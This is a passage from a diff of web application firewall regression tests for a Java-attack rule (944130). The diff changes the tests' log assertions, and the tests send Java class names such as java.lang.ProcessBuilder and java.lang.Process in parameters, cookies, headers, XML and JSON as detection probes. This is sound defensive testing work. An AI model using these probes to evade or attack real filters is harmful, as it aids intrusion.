 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 214
 desc: "Request header test includes keyword java.io.PipedReader"
 stages:
@@ -4129,7 +4342,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 215
 desc: "XML attribute value includes keyword java.io.PipedReader"
 stages:
@@ -4148,7 +4362,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 216
 desc: "XML element value includes keyword java.io.PipedReader"
 stages:
@@ -4167,7 +4382,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.PipedReader"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 217
 desc: "Nested XML element value includes keyword java.io.PipedReader"
 stages:
@@ -4186,7 +4402,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.PipedReader"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 218
 desc: "Content-Type text/plain includes keyword java.io.PipedReader"
 stages:
@@ -4205,7 +4422,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.io.PipedReader"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 219
 desc: "Content-Type application/json arg value includes keyword java.io.PipedReader"
 stages:
@@ -4224,7 +4442,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"java.io.PipedReader\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 220
 desc: "Content-Type application/json arg name includes keyword java.io.PipedReader"
 stages:
@@ -4243,7 +4462,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"java.io.PipedReader\": \"test\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 221
 desc: "Argument test includes keyword java.io.PrintStream"
 stages:
@@ -4262,7 +4482,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.io.PrintStream"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 222
 desc: "Argument name includes keyword java.io.PrintStream"
 stages:
@@ -4281,7 +4502,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.PrintStream=test"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 223
 desc: "Cookie test includes keyword java.io.PrintStream"
 stages:
@@ -4301,7 +4523,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 224
 desc: "Cookie name includes keyword java.io.PrintStream"
 stages:
@@ -4321,7 +4544,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 225
 desc: "Request header test includes keyword java.io.PrintStream"
 stages:
@@ -4341,7 +4565,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 226
 desc: "XML attribute value includes keyword java.io.PrintStream"
 stages:
@@ -4360,7 +4585,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 227
 desc: "XML element value includes keyword java.io.PrintStream"
 stages:
@@ -4379,7 +4605,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.PrintStream"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 228
 desc: "Nested XML element value includes keyword java.io.PrintStream"
 stages:
@@ -4398,7 +4625,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.PrintStream"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 229
 desc: "Content-Type text/plain includes keyword java.io.PrintStream"
 stages:
@@ -4417,7 +4645,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.io.PrintStream"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 230
 desc: "Content-Type application/json arg value includes keyword java.io.PrintStream"
 stages:
@@ -4436,7 +4665,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"java.io.PrintStream\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 231
 desc: "Content-Type application/json arg name includes keyword java.io.PrintStream"
 stages:
@@ -4455,7 +4685,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"java.io.PrintStream\": \"test\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 232
 desc: "Argument test includes keyword java.io.PushbackInputStream"
 stages:
@@ -4474,7 +4705,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.io.PushbackInputStream"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 233
 desc: "Argument name includes keyword java.io.PushbackInputStream"
 stages:
@@ -4493,7 +4725,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.PushbackInputStream=test"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 234
 desc: "Cookie test includes keyword java.io.PushbackInputStream"
 stages:
@@ -4513,7 +4746,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 235
 desc: "Cookie name includes keyword java.io.PushbackInputStream"
 stages:
@@ -4533,7 +4767,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 236
 desc: "Request header test includes keyword java.io.PushbackInputStream"
 stages:
@@ -4553,7 +4788,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 237
 desc: "XML attribute value includes keyword java.io.PushbackInputStream"
 stages:
@@ -4572,7 +4808,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 238
 desc: "XML element value includes keyword java.io.PushbackInputStream"
 stages:
@@ -4591,7 +4828,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.PushbackInputStream"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 239
 desc: "Nested XML element value includes keyword java.io.PushbackInputStream"
 stages:
@@ -4610,7 +4848,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.PushbackInputStream"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 240
 desc: "Content-Type text/plain includes keyword java.io.PushbackInputStream"
 stages:
@@ -4629,7 +4868,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.io.PushbackInputStream"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 241
 desc: "Content-Type application/json arg value includes keyword java.io.PushbackInputStream"
 stages:
@@ -4648,7 +4888,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"java.io.PushbackInputStream\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 242
 desc: "Content-Type application/json arg name includes keyword java.io.PushbackInputStream"
 stages:
@@ -4667,7 +4908,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"java.io.PushbackInputStream\": \"test\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 243
 desc: "Argument test includes keyword java.io.Reader"
 stages:
@@ -4686,7 +4928,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.io.Reader"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 244
 desc: "Argument name includes keyword java.io.Reader"
 stages:
@@ -4705,7 +4948,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.Reader=test"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 245
 desc: "Cookie test includes keyword java.io.Reader"
 stages:
@@ -4725,7 +4969,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 246
 desc: "Cookie name includes keyword java.io.Reader"
 stages:
@@ -4745,7 +4990,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 247
 desc: "Request header test includes keyword java.io.Reader"
 stages:
@@ -4765,7 +5011,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 248
 desc: "XML attribute value includes keyword java.io.Reader"
 stages:
@@ -4784,7 +5031,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 249
 desc: "XML element value includes keyword java.io.Reader"
 stages:
@@ -4803,7 +5051,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.Reader"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 250
 desc: "Nested XML element value includes keyword java.io.Reader"
 stages:
@@ -4822,7 +5071,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.Reader"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 251
 desc: "Content-Type text/plain includes keyword java.io.Reader"
 stages:
@@ -4841,7 +5091,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.io.Reader"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 252
 desc: "Content-Type application/json arg value includes keyword java.io.Reader"
 stages:
@@ -4860,7 +5111,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"java.io.Reader\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 253
 desc: "Content-Type application/json arg name includes keyword java.io.Reader"
 stages:
@@ -4879,7 +5131,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"java.io.Reader\": \"test\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 254
 desc: "Argument test includes keyword java.io.StringReader"
 stages:
@@ -4898,7 +5151,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.io.StringReader"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 255
 desc: "Argument name includes keyword java.io.StringReader"
 stages:
@@ -4917,7 +5171,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.StringReader=test"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 256
 desc: "Cookie test includes keyword java.io.StringReader"
 stages:
@@ -4937,7 +5192,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 257
 desc: "Cookie name includes keyword java.io.StringReader"
 stages:
@@ -4957,7 +5213,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 258
 desc: "Request header test includes keyword java.io.StringReader"
 stages:
@@ -4977,7 +5234,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 259
 desc: "XML attribute value includes keyword java.io.StringReader"
 stages:
@@ -4996,7 +5254,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 260
 desc: "XML element value includes keyword java.io.StringReader"
 stages:
@@ -5015,7 +5274,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.StringReader"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 261
 desc: "Nested XML element value includes keyword java.io.StringReader"
 stages:
@@ -5034,7 +5294,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.StringReader"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 262
 desc: "Content-Type text/plain includes keyword java.io.StringReader"
 stages:
@@ -5053,7 +5314,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.io.StringReader"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 263
 desc: "Content-Type application/json arg value includes keyword java.io.StringReader"
 stages:
@@ -5072,7 +5334,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"java.io.StringReader\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 264
 desc: "Content-Type application/json arg name includes keyword java.io.StringReader"
 stages:
@@ -5091,7 +5354,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"java.io.StringReader\": \"test\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 265
 desc: "Argument test includes keyword java.lang.Class"
 stages:
@@ -5110,7 +5374,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.lang.Class"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 266
 desc: "Argument name includes keyword java.lang.Class"
 stages:
@@ -5129,7 +5394,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.lang.Class=test"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 267
 desc: "Cookie test includes keyword java.lang.Class"
 stages:
@@ -5149,7 +5415,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 268
 desc: "Cookie name includes keyword java.lang.Class"
 stages:
@@ -5169,7 +5436,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 269
 desc: "Request header test includes keyword java.lang.Class"
 stages:
@@ -5189,7 +5457,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 270
 desc: "XML attribute value includes keyword java.lang.Class"
 stages:
@@ -5208,7 +5477,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 271
 desc: "XML element value includes keyword java.lang.Class"
 stages:
@@ -5227,7 +5497,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.lang.Class"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 272
 desc: "Nested XML element value includes keyword java.lang.Class"
 stages:
@@ -5246,7 +5517,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.lang.Class"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 273
 desc: "Content-Type text/plain includes keyword java.lang.Class"
 stages:
@@ -5265,7 +5537,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.lang.Class"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 274
 desc: "Content-Type application/json arg value includes keyword java.lang.Class"
 stages:
@@ -5284,7 +5557,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"java.lang.Class\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 275
 desc: "Content-Type application/json arg name includes keyword java.lang.Class"
 stages:
@@ -5303,7 +5577,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"java.lang.Class\": \"test\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 276
 desc: "Argument test includes keyword java.lang.Integer"
 stages:
@@ -5322,7 +5597,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.lang.Integer"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 277
 desc: "Argument name includes keyword java.lang.Integer"
 stages:
@@ -5341,7 +5617,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.lang.Integer=test"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 278
 desc: "Cookie test includes keyword java.lang.Integer"
 stages:
@@ -5361,7 +5638,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 279
 desc: "Cookie name includes keyword java.lang.Integer"
 stages:
@@ -5381,7 +5659,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 280
 desc: "Request header test includes keyword java.lang.Integer"
 stages:
@@ -5401,7 +5680,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 281
 desc: "XML attribute value includes keyword java.lang.Integer"
 stages:
@@ -5420,7 +5700,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 282
 desc: "XML element value includes keyword java.lang.Integer"
 stages:
@@ -5439,7 +5720,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.lang.Integer"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 283
 desc: "Nested XML element value includes keyword java.lang.Integer"
 stages:
@@ -5458,7 +5740,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.lang.Integer"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 284
 desc: "Content-Type text/plain includes keyword java.lang.Integer"
 stages:
@@ -5477,7 +5760,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.lang.Integer"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 285
 desc: "Content-Type application/json arg value includes keyword java.lang.Integer"
 stages:
@@ -5496,7 +5780,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"java.lang.Integer\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 286
 desc: "Content-Type application/json arg name includes keyword java.lang.Integer"
 stages:
@@ -5515,7 +5800,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"java.lang.Integer\": \"test\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 287
 desc: "Argument test includes keyword java.lang.Number"
 stages:
@@ -5534,7 +5820,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.lang.Number"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 288
 desc: "Argument name includes keyword java.lang.Number"
 stages:
@@ -5553,7 +5840,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.lang.Number=test"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 289
 desc: "Cookie test includes keyword java.lang.Number"
 stages:
@@ -5573,7 +5861,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 290
 desc: "Cookie name includes keyword java.lang.Number"
 stages:
@@ -5593,7 +5882,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 291
 desc: "Request header test includes keyword java.lang.Number"
 stages:
@@ -5613,7 +5903,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 292
 desc: "XML attribute value includes keyword java.lang.Number"
 stages:
@@ -5632,7 +5923,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 293
 desc: "XML element value includes keyword java.lang.Number"
 stages:
@@ -5651,7 +5943,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.lang.Number"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 294
 desc: "Nested XML element value includes keyword java.lang.Number"
 stages:
@@ -5670,7 +5963,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.lang.Number"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 295
 desc: "Content-Type text/plain includes keyword java.lang.Number"
 stages:
@@ -5689,7 +5983,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.lang.Number"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 296
 desc: "Content-Type application/json arg value includes keyword java.lang.Number"
 stages:
@@ -5708,7 +6003,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"java.lang.Number\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 297
 desc: "Content-Type application/json arg name includes keyword java.lang.Number"
 stages:
@@ -5727,7 +6023,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"java.lang.Number\": \"test\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 298
 desc: "Argument test includes keyword java.lang.Object"
 stages:
@@ -5746,7 +6043,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.lang.Object"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 299
 desc: "Argument name includes keyword java.lang.Object"
 stages:
@@ -5765,7 +6063,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.lang.Object=test"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 300
 desc: "Cookie test includes keyword java.lang.Object"
 stages:
@@ -5785,7 +6084,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 301
 desc: "Cookie name includes keyword java.lang.Object"
 stages:
@@ -5805,7 +6105,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 302
 desc: "Request header test includes keyword java.lang.Object"
 stages:
@@ -5825,7 +6126,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 303
 desc: "XML attribute value includes keyword java.lang.Object"
 stages:
@@ -5844,7 +6146,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 304
 desc: "XML element value includes keyword java.lang.Object"
 stages:
@@ -5863,7 +6166,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.lang.Object"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 305
 desc: "Nested XML element value includes keyword java.lang.Object"
 stages:
@@ -5882,7 +6186,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.lang.Object"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 306
 desc: "Content-Type text/plain includes keyword java.lang.Object"
 stages:
@@ -5901,7 +6206,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.lang.Object"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 307
 desc: "Content-Type application/json arg value includes keyword java.lang.Object"
 stages:
@@ -5920,7 +6226,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"java.lang.Object\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 308
 desc: "Content-Type application/json arg name includes keyword java.lang.Object"
 stages:
@@ -5939,7 +6246,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"java.lang.Object\": \"test\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 309
 desc: "Argument test includes keyword java.lang.Process"
 stages:
@@ -5958,7 +6266,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.lang.Process"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 310
 desc: "Argument name includes keyword java.lang.Process"
 stages:
@@ -5977,7 +6286,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.lang.Process=test"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 311
 desc: "Cookie test includes keyword java.lang.Process"
 stages:
@@ -5997,7 +6307,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 312
 desc: "Cookie name includes keyword java.lang.Process"
 stages:
@@ -6017,7 +6328,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 313
 desc: "Request header test includes keyword java.lang.Process"
 stages:
@@ -6037,7 +6349,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 314
 desc: "XML attribute value includes keyword java.lang.Process"
 stages:
@@ -6056,7 +6369,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 315
 desc: "XML element value includes keyword java.lang.Process"
 stages:
@@ -6075,7 +6389,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.lang.Process"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 316
 desc: "Nested XML element value includes keyword java.lang.Process"
 stages:
@@ -6094,7 +6409,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.lang.Process"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 317
 desc: "Content-Type text/plain includes keyword java.lang.Process"
 stages:
@@ -6113,7 +6429,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.lang.Process"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 318
 desc: "Content-Type application/json arg value includes keyword java.lang.Process"
 stages:
@@ -6132,7 +6449,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"java.lang.Process\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 319
 desc: "Content-Type application/json arg name includes keyword java.lang.Process"
 stages:
@@ -6151,7 +6469,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"java.lang.Process\": \"test\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 320
 desc: "Argument test includes keyword java.lang.ProcessBuilder"
 stages:
@@ -6170,7 +6489,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.lang.ProcessBuilder"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 321
 desc: "Argument name includes keyword java.lang.ProcessBuilder"
 stages:
@@ -6189,7 +6509,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.lang.ProcessBuilder=test"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 322
 desc: "Cookie test includes keyword java.lang.ProcessBuilder"
 stages:
@@ -6209,7 +6530,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 323
 desc: "Cookie name includes keyword java.lang.ProcessBuilder"
 stages:
@@ -6229,7 +6551,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 324
 desc: "Request header test includes keyword java.lang.ProcessBuilder"
 stages:
@@ -6249,7 +6572,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 325 desc: "XML attribute value includes keyword java.lang.ProcessBuilder" stages: @@ -6268,7 +6592,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 326 desc: "XML element value includes keyword java.lang.ProcessBuilder" stages: @@ -6287,7 +6612,8 @@ tests: version: "HTTP/1.0" data: "java.lang.ProcessBuilder" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 327 desc: "Nested XML element value includes keyword java.lang.ProcessBuilder" stages: @@ -6306,7 +6632,8 @@ tests: version: "HTTP/1.0" data: "java.lang.ProcessBuilder" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 328 desc: "Content-Type text/plain includes keyword java.lang.ProcessBuilder" stages: @@ -6325,7 +6652,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.ProcessBuilder" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 329 desc: "Content-Type application/json arg value includes keyword java.lang.ProcessBuilder" stages: @@ -6344,7 +6672,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.lang.ProcessBuilder\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 330 desc: "Content-Type application/json arg name includes keyword java.lang.ProcessBuilder" stages: @@ -6363,7 +6692,8 @@ tests: version: "HTTP/1.0" 